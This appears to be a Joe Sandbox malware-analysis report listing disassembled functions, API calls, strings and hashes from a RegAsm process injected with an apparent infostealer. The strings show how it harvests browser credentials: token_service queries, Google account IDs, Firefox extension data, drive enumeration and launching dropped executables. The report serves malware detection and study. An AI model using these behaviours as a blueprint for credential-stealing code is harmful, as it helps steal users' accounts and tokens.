                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00413738: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00413E1B,?,?,.exe,00425200), ref: 00413759
                                                    • memset.MSVCRT ref: 00413E26
                                                    • memset.MSVCRT ref: 00413E36
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00428E60,?,?), ref: 00413EA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcatmemset$AllocateConnectFileOptionSendSystemTimelstrlen
                                                    • String ID: .exe$C:\Program Files (x86)\Internet Explorer\ielowutil.exe$rBA$rBA
                                                    • API String ID: 54917473-2241296711
                                                    • Opcode ID: 0c9e794474cbd8b9f959dc737bd49f21f3e301095ee32192b0151e9f2087f051
                                                    • Instruction ID: 6e0f2c16cacc39a04d56a59c7a2eb00cd39a9aaba75bb456b19badbc384f9bd3
                                                    • Opcode Fuzzy Hash: 0c9e794474cbd8b9f959dc737bd49f21f3e301095ee32192b0151e9f2087f051
                                                    • Instruction Fuzzy Hash: 9E515371E00318ABDB10EBA1DC52BED7378AB10305F60406FF616A21D1DB795B89CF59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [%!g,%!g],$[%!g,%!g]]
                                                    • API String ID: 0-3388633204
                                                    • Opcode ID: 113bdc7d54bd5de70cae0fa5a164f0707397aac7c2dcd618b7034b86ed6cce69
                                                    • Instruction ID: c9a856f28000e9bb99d4029a9f05e74608bdd96b5f3b7afc659741caa8e9a500
                                                    • Opcode Fuzzy Hash: 113bdc7d54bd5de70cae0fa5a164f0707397aac7c2dcd618b7034b86ed6cce69
                                                    • Instruction Fuzzy Hash: F4514630A047029BD700CF29CCC0B97B7F5AF4A7A0F404669F94A9A240F77EB555DBA2
                                                    Strings
                                                    • malformed inverted index for FTS%d table %s.%s, xrefs: 1FA4F3F3
                                                    • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1FA4F33F
                                                    • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1FA4F418
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                    • API String ID: 0-2809892521
                                                    • Opcode ID: 2ca72420d95dd163459e0cc4305ab6578d064f36bdf8a2016377ab9923bfcf19
                                                    • Instruction ID: a707cf91a8f71dcbe5cfa839e2f87bd7b047116204bf94a335a615a38dbc9d84
                                                    • Opcode Fuzzy Hash: 2ca72420d95dd163459e0cc4305ab6578d064f36bdf8a2016377ab9923bfcf19
                                                    • Instruction Fuzzy Hash: 154119B15092229BD710DB26DC8CADB37ACEF41775F140469FE05C7240E73EA165EBA1
                                                    APIs
                                                    • lstrlenA.KERNEL32(?), ref: 00416A7B
                                                    • memset.MSVCRT ref: 00416AB0
                                                    • GetDriveTypeA.KERNEL32(?), ref: 00416ACA
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416AF5
                                                      • Part of subcall function 004133A2: StrStrA.SHLWAPI(?,?,?,?,00414C10,?,00000000), ref: 004133AC
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B1D
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B35
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B5D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$DriveTypelstrlenmemset
                                                    • String ID: %DRIVE_REMOVABLE%$lA
                                                    • API String ID: 2639794215-3429080066
                                                    • Opcode ID: a8ee40e0d1b07a0685d1cd63947ad5e4342cde52dfa35eb57268763b7acb9308
                                                    • Instruction ID: c9cf622a35b6895bce40c4c662a0522535cfb9cd2736c84f33ab931169bf0e59
                                                    • Opcode Fuzzy Hash: a8ee40e0d1b07a0685d1cd63947ad5e4342cde52dfa35eb57268763b7acb9308
                                                    • Instruction Fuzzy Hash: 712148B1904118ABDF20AF70CC45BED7BB8BB15304F5040AAB65EE6161DF399AC9CF18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d211a70dd9546ee4a924dc17a5d612feae6c5f0764661e941ca87c64ad7e0efc
                                                    • Instruction ID: a4e420bec3bb12ed7855af047e89300686d55d611247d1f2ab608296331d3df9
                                                    • Opcode Fuzzy Hash: d211a70dd9546ee4a924dc17a5d612feae6c5f0764661e941ca87c64ad7e0efc
                                                    • Instruction Fuzzy Hash: 94517275608301AFDB40EF68FC04E9B7BE2EF85320F1945A8F1588B2B1E336E9519B41
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edb10275622e5fa9e591a4518a83a1545d5a5564f75bfd8f40387b01c0b5d797
                                                    • Instruction ID: fc5a00a28edbd25e3c388d5a84610f15269e8c87207f97617d4d542080c95b91
                                                    • Opcode Fuzzy Hash: edb10275622e5fa9e591a4518a83a1545d5a5564f75bfd8f40387b01c0b5d797
                                                    • Instruction Fuzzy Hash: 651196FDD042007FD7049B14ED41E6B77EAEF91600F840499F84587221E73EFA1992A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                    • Instruction ID: 884b322f92260a4d8b0cafa8ac5cec4d1d2834d1639c30455253a884c93429d6
                                                    • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                    • Instruction Fuzzy Hash: ABB19CB5A04302ABC704DF29CD80A5ABBE5FF88214F444939F949D7711E73DF9648BA1
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409E0A
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00409E36
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409F0D
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409F21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                    • String ID: AccountId$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                    • API String ID: 3306365304-465000181
                                                    • Opcode ID: 5bc696806b497ab0423ea5bfc07e34e3275cbdb623a122d363852225f6480c86
                                                    • Instruction ID: 77dc25ccb64a9070525839547ae20bab8b4c21683db2df3dfd4faf0e6278306d
                                                    • Opcode Fuzzy Hash: 5bc696806b497ab0423ea5bfc07e34e3275cbdb623a122d363852225f6480c86
                                                    • Instruction Fuzzy Hash: 4EA1EC72900118AADF04FBA1DD96EED7779EF14305F50016EF216B21F1EF399A88CA58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                    • API String ID: 0-2679805236
                                                    • Opcode ID: be4c94ccddcdf27aafe9742eedb07089d8434b3da4df113571c449d57359694f
                                                    • Instruction ID: cf2c7ac362fbe739cd0c63a31e96797de7e3b5996813193813ea73ea53622dc9
                                                    • Opcode Fuzzy Hash: be4c94ccddcdf27aafe9742eedb07089d8434b3da4df113571c449d57359694f
                                                    • Instruction Fuzzy Hash: 0B71B071E043478FC700CF29D884A9AB7E5AFC4365F050569E989D7201FB7EE905CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                    • API String ID: 0-3864549341
                                                    • Opcode ID: 394a768806f457ac5c27136f44965163aec5a3acb62638b9ff3658401f75f478
                                                    • Instruction ID: 52e979105d154e8f8edf1d0809d6779b1e52da485386a142d6a866f392481357
                                                    • Opcode Fuzzy Hash: 394a768806f457ac5c27136f44965163aec5a3acb62638b9ff3658401f75f478
                                                    • Instruction Fuzzy Hash: 386165B5EC0B02ABE7058F20FC45BD777A4EF41706F004228F8995A682E7B9F15687A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                    • API String ID: 0-131617836
                                                    • Opcode ID: d885cfe3cf4367f4e1649dbd56b1817b7eb8ed1095f5c6dcf6b049613b717c6b
                                                    • Instruction ID: a76f236edb4e4e12ea9b6c0deba837a339255f4ce9f40ba54c9bd56b213a47ea
                                                    • Opcode Fuzzy Hash: d885cfe3cf4367f4e1649dbd56b1817b7eb8ed1095f5c6dcf6b049613b717c6b
                                                    • Instruction Fuzzy Hash: A4510776A042828BD301DF18D44076AB7B1BF82324FAD41A8EC865F645D73EFD96CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: main$rbu_memory
                                                    • API String ID: 0-3973752345
                                                    • Opcode ID: 8ff282c5b98d7bdffee04a53b3a73b9a54964e7fb5cb0ba358e8ba77195af243
                                                    • Instruction ID: e500a480bc248b221b66e6c423cf7cb295e2b4c21dc40f31cf640d9b083e350e
                                                    • Opcode Fuzzy Hash: 8ff282c5b98d7bdffee04a53b3a73b9a54964e7fb5cb0ba358e8ba77195af243
                                                    • Instruction Fuzzy Hash: 7E51BC757043029BDB018F6AD880B9AB3E8AF84324F284479E945D7341EB3EF915CB91
                                                    Strings
                                                    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1FA38D35
                                                    • winAccess, xrefs: 1FA38D60
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                    • API String ID: 0-1873940834
                                                    • Opcode ID: 800d9f74abb46bc539925ff2bb5b33a76ada4b2f2524208af10a210f99a933f2
                                                    • Instruction ID: fabd779339210aeb1dad4edc51fa46da0663f5e7e768f744ea6a30a7cba05e09
                                                    • Opcode Fuzzy Hash: 800d9f74abb46bc539925ff2bb5b33a76ada4b2f2524208af10a210f99a933f2
                                                    • Instruction Fuzzy Hash: 24414CB3D053429BD700DF388D8159AFBE1AF94361F810A29F956532D0E73DF448C682
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72ed71d891d440f4504509f5f8e805f13cb3246e028a777498a28e9448700066
                                                    • Instruction ID: 1237063d8a1ea166d929647c78f1c118aabacbf1a98e40ead71d7ae02bab89ee
                                                    • Opcode Fuzzy Hash: 72ed71d891d440f4504509f5f8e805f13cb3246e028a777498a28e9448700066
                                                    • Instruction Fuzzy Hash: 7D5150705082229BDB109B76EACCA9737B5EF00B79B104164EB47C2351EB37E464FA52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                    • API String ID: 0-3074873597
                                                    • Opcode ID: 6d83038c4e734cf3cb723c49f177cf66596bd67534c4d46d7af499d1720c8786
                                                    • Instruction ID: 4ae89300b5f7cafa698cce8d07618ad3dcc2b6b08f7b1a8a3d3eb192e30ea9ba
                                                    • Opcode Fuzzy Hash: 6d83038c4e734cf3cb723c49f177cf66596bd67534c4d46d7af499d1720c8786
                                                    • Instruction Fuzzy Hash: F74169B9B04740AEF3105B54EC81BEB77B4DB81329F08062AF551C55D2E3BEB59887E2
                                                    Strings
                                                    • no such database: %s, xrefs: 1FA41E05
                                                    • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1FA41E2C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                    • API String ID: 0-1404816483
                                                    • Opcode ID: 1a71c691966eccb7e83c3aa4afdae9702f2482166c7ef31a633ab04d147748c1
                                                    • Instruction ID: dbf39bc301f1263e6975e4edbf85f1bcc8890127989df9c8eec1760a1c0239fa
                                                    • Opcode Fuzzy Hash: 1a71c691966eccb7e83c3aa4afdae9702f2482166c7ef31a633ab04d147748c1
                                                    • Instruction Fuzzy Hash: 7E3130BA7043096BC3115F69EC00BABB7D8FF85265F5505A9FD589B201EA7EF90087E0
                                                    APIs
                                                    • lstrcatA.KERNEL32(?,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004176B3
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004176D8
                                                    • lstrcatA.KERNEL32(?,?), ref: 004176F7
                                                    • lstrcatA.KERNEL32(?,?), ref: 0041770B
                                                    • lstrcatA.KERNEL32(?), ref: 0041771E
                                                    • lstrcatA.KERNEL32(?,?), ref: 00417732
                                                    • lstrcatA.KERNEL32(?), ref: 00417745
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412F4C: GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                      • Part of subcall function 0041738D: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041739D
                                                      • Part of subcall function 0041738D: HeapAlloc.KERNEL32(00000000), ref: 004173A4
                                                      • Part of subcall function 0041738D: wsprintfA.USER32 ref: 004173BF
                                                      • Part of subcall function 0041738D: FindFirstFileA.KERNEL32(?,?), ref: 004173D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                    • String ID:
                                                    • API String ID: 167551676-0
                                                    • Opcode ID: 19d46f79466a16adfb6237fd03812389400bbc0a050d161e9df90e3c44a7870d
                                                    • Instruction ID: c5585e3932353d299f890bbdf4fd6802cc5655e913b06a812739708d6539e0eb
                                                    • Opcode Fuzzy Hash: 19d46f79466a16adfb6237fd03812389400bbc0a050d161e9df90e3c44a7870d
                                                    • Instruction Fuzzy Hash: 2431F1B290421C6BCF10FFB1DD89DDD77BCAB08304F4404A6B615D6051EAB8E6D88F65
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac8a36534ab633fee14af6b4b5a423e7cad131cf5d9ad1498cb4d511f79c8d2c
                                                    • Instruction ID: 8ab8e2b19b7c88d8ac537c4863f8594805278becdce8271f71eaa62fe118f3c7
                                                    • Opcode Fuzzy Hash: ac8a36534ab633fee14af6b4b5a423e7cad131cf5d9ad1498cb4d511f79c8d2c
                                                    • Instruction Fuzzy Hash: C6F1D0B5A083419FD701CF29D8807AABBE0BF44324F44466DF99A9B241E73EF945CB91
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00428FB4,00425200), ref: 0040DEC0
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040DEDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                    • String ID: C@$C@$^userContextId=4294967295$moz-extension+++
                                                    • API String ID: 998311485-138545164
                                                    • Opcode ID: a72a3559896110f6474a71aed108b964a839d875c31ac5ad439b653e2e8a8193
                                                    • Instruction ID: 390c660c022c56871494b74ebfb6bb5724ba9b294bf0ffd1339ba326bfc1dd12
                                                    • Opcode Fuzzy Hash: a72a3559896110f6474a71aed108b964a839d875c31ac5ad439b653e2e8a8193
                                                    • Instruction Fuzzy Hash: 0251EC71D002089ACF04FBF1ED569ED7779AF14308F50812EF526A61E1EF399A48CB59
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00414601
                                                    • StrCmpCA.SHLWAPI(00000000,004295CC,?,?,00000000), ref: 00414671
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                    • strtok_s.MSVCRT ref: 00414783
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok_s$lstrcpylstrlen
                                                    • String ID:
                                                    • API String ID: 348468850-0
                                                    • Opcode ID: 00231ea341b1bd606fb9bde8bd61a413fedfdbce7b3da8c98345d4e06dc490f6
                                                    • Instruction ID: 812b5d921522d9878ae6b572a8c608e258586ff71476c89f6a289d4f29213e72
                                                    • Opcode Fuzzy Hash: 00231ea341b1bd606fb9bde8bd61a413fedfdbce7b3da8c98345d4e06dc490f6
                                                    • Instruction Fuzzy Hash: A6512C75A0120AEFCB04DF54D985AEE7BB4FF46309F10405AE811AB2A1D738DE91CF95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
                                                    • API String ID: 0-231581592
                                                    • Opcode ID: 90de8fe93957832ad767fe957235c3d69b5225aec65fbbb9a5b7edf72b73d307
                                                    • Instruction ID: 68ff174d0d7d1d79d21872eaeaf2d1bb2ccb9fec11f249f0a983efb61f0b0534
                                                    • Opcode Fuzzy Hash: 90de8fe93957832ad767fe957235c3d69b5225aec65fbbb9a5b7edf72b73d307
                                                    • Instruction Fuzzy Hash: F4E105B0B043459FD701CF29E880B9ABBE4FF55714F24466CE9489B262E739F944CB92
                                                    Strings
                                                    • recursively defined fts5 content table, xrefs: 1FA46DE2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: recursively defined fts5 content table
                                                    • API String ID: 0-437020801
                                                    • Opcode ID: 7363e3204ec7485f6bb19d3c3047d25841165f783fad0b55df1cb33193c459ec
                                                    • Instruction ID: 42265b11a2d2f977e800c2d6bc818e88d1c7e38e65f71a01b528be96b7c21805
                                                    • Opcode Fuzzy Hash: 7363e3204ec7485f6bb19d3c3047d25841165f783fad0b55df1cb33193c459ec
                                                    • Instruction Fuzzy Hash: 95D1D2B5905385CFD714CF19C480796BBE0FF89324F680A5EE8858B251E77DE489CB92
                                                    APIs
                                                    • __lock.LIBCMT ref: 004222AF
                                                      • Part of subcall function 00421E6F: __mtinitlocknum.LIBCMT ref: 00421E85
                                                      • Part of subcall function 00421E6F: __amsg_exit.LIBCMT ref: 00421E91
                                                      • Part of subcall function 00421E6F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7,?,?,004219C7,00000000,0042D418,00421A0E,?), ref: 00421E99
                                                    • DecodePointer.KERNEL32(0042D2F8,00000020,004223F2,00000000,00000001,00000000,?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D), ref: 004222EB
                                                    • DecodePointer.KERNEL32(?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 004222FC
                                                      • Part of subcall function 004229E7: EncodePointer.KERNEL32(00000000,00422F61,00641AE0,00000314,00000000,?,?,?,?,?,00422609,00641AE0,Microsoft Visual C++ Runtime Library,00012010), ref: 004229E9
                                                    • DecodePointer.KERNEL32(-00000004,?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 00422322
                                                    • DecodePointer.KERNEL32(?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 00422335
                                                    • DecodePointer.KERNEL32(?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 0042233F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2005412495-0
                                                    • Opcode ID: 15a90aa08abd1b7f0407e5378db09f0277a502efb28e9984ecd923f6b9229d8c
                                                    • Instruction ID: 21bd01a89b860d135315606c98542cdd3223532f0af3f31ea5e13f43a36d2ffc
                                                    • Opcode Fuzzy Hash: 15a90aa08abd1b7f0407e5378db09f0277a502efb28e9984ecd923f6b9229d8c
